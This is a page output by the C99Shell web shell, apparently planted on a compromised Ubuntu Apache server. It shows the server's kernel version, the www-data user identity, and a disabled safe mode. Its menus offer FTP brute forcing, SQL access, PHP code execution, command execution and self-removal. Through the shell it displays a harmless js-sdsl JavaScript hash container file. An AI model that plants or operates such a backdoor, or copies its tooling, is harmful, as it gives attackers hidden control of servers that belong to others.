!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/pmb/node_modules/js-sdsl/dist/esm/container/HashContainer/Base/   drwxr-xr-x
Free 13.22 GB of 57.97 GB (22.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.js (1.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
var __extends = this && this.t || function() {
    var extendStatics = function(n, t) {
        extendStatics = Object.setPrototypeOf || {
            __proto__: []
        } instanceof Array && function(n, t) {
            n.__proto__ = t;
        } || function(n, t) {
            for (var r in t) if (Object.prototype.hasOwnProperty.call(t, r)) n[r] = t[r];
        };
        return extendStatics(n, t);
    };
    return function(n, t) {
        if (typeof t !== "function" && t !== null) throw new TypeError("Class extends value " + String(t) + " is not a constructor or null");
        extendStatics(n, t);
        function __() {
            this.constructor = n;
        }
        n.prototype = t === null ? Object.create(t) : (__.prototype = t.prototype, new __);
    };
}();

import { Base } from "../../ContainerBase";

var HashContainer = function(n) {
    __extends(HashContainer, n);
    function HashContainer(t, r) {
        if (t === void 0) {
            t = 16;
        }
        if (r === void 0) {
            r = function(n) {
                var t;
                if (typeof n !== "string") {
                    t = JSON.stringify(n);
                } else t = n;
                var r = 0;
                var i = t.length;
                for (var e = 0; e < i; e++) {
                    var o = t.charCodeAt(e);
                    r = (r << 5) - r + o;
                    r |= 0;
                }
                return r >>> 0;
            };
        }
        var i = n.call(this) || this;
        if (t < 16 || (t & t - 1) !== 0) {
            throw new RangeError("InitBucketNum range error");
        }
        i.l = i.nn = t;
        i.p = r;
        return i;
    }
    HashContainer.prototype.clear = function() {
        this.o = 0;
        this.l = this.nn;
        this.h = [];
    };
    return HashContainer;
}(Base);

export default HashContainer;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--